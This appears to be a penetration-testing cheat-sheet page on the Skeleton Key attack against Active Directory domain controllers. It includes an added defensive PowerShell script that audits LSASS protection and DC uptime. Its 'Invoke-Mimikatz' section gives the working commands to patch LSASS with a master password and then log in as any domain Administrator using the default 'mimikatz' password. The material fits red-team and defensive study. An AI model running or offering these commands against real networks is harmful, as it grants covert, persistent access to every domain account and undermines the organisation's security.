
# Skeleton Key

## Description

Skeleton Key is a persistence attack that injects into the LSASS (Local Security Authority Subsystem Service) process and creates a master password that works for any domain account. Existing passwords keep working, which makes it hard to tell whether the attack has taken place. Rebooting the domain controller removes the changes made by the attack. Carrying it out requires an account with domain administrator privileges.
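Because the change lives only in LSASS memory on the domain controller and is cleared by a reboot, two facts are worth auditing on every DC: whether LSASS is configured to run as a protected process, and when the host last booted (which bounds how long an in-memory patch could have been present). The following is an added defensive example, not part of the original page; the function name `Get-DcLsassExposure` is hypothetical, and it assumes the ActiveDirectory RSAT module, PowerShell remoting to the DCs, and read access to HKLM on them.

```powershell
# Added example (not from the original page). Hypothetical helper name.
# Assumptions: ActiveDirectory module available, WinRM enabled on the DCs.
Import-Module ActiveDirectory

function Get-DcLsassExposure {
    [CmdletBinding()]
    param(
        # Defaults to every domain controller in the current domain.
        [string[]]$ComputerName = (Get-ADDomainController -Filter *).HostName
    )

    foreach ($dc in $ComputerName) {
        try {
            Invoke-Command -ComputerName $dc -ErrorAction Stop -ScriptBlock {
                $lsa  = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
                $boot = (Get-CimInstance -ClassName Win32_OperatingSystem).LastBootUpTime

                # RunAsPPL: 1 or 2 = LSASS configured as a protected process;
                # absent or 0 = not configured.
                $ppl = $lsa.RunAsPPL

                [pscustomobject]@{
                    DomainController = $env:COMPUTERNAME
                    RunAsPPL         = if ($null -eq $ppl) { 'not set' } else { $ppl }
                    LsaProtected     = ($ppl -in 1, 2)
                    LastBoot         = $boot
                    # A reboot clears an in-memory LSASS patch, so uptime is
                    # the maximum window such a patch could have persisted.
                    UptimeDays       = [math]::Round(((Get-Date) - $boot).TotalDays, 1)
                }
            } | Select-Object DomainController, RunAsPPL, LsaProtected, LastBoot, UptimeDays
        }
        catch {
            # Report unreachable DCs instead of silently skipping them.
            [pscustomobject]@{
                DomainController = $dc
                RunAsPPL         = 'unknown'
                LsaProtected     = $null
                LastBoot         = $null
                UptimeDays       = $null
            }
            Write-Warning "Could not query ${dc}: $($_.Exception.Message)"
        }
    }
}

# Show DCs without LSA protection first, longest uptime first.
Get-DcLsassExposure | Sort-Object LsaProtected, @{ Expression = 'UptimeDays'; Descending = $true } | Format-Table -AutoSize
```

The registry value reflects configuration only; it takes effect after a reboot, so a DC that reports `LsaProtected = True` but booted before the value was set is not yet protected.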

## Invoke-Mimikatz

1\) Run the Skeleton Key attack using Invoke-Mimikatz.

```powershell
Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName <DC01.ACME.LOCAL>
```

2\) PowerShell remoting to the domain controller host with the Administrator user and the default password `mimikatz`.

```powershell
$UserPassword = ConvertTo-SecureString "mimikatz" -AsPlainText -Force
$UserCredential = New-Object System.Management.Automation.PSCredential ("<ACME.LOCAL>\Administrator", $UserPassword)
Enter-PSSession -ComputerName <DC01.ACME.LOCAL> -Credential $UserCredential
```

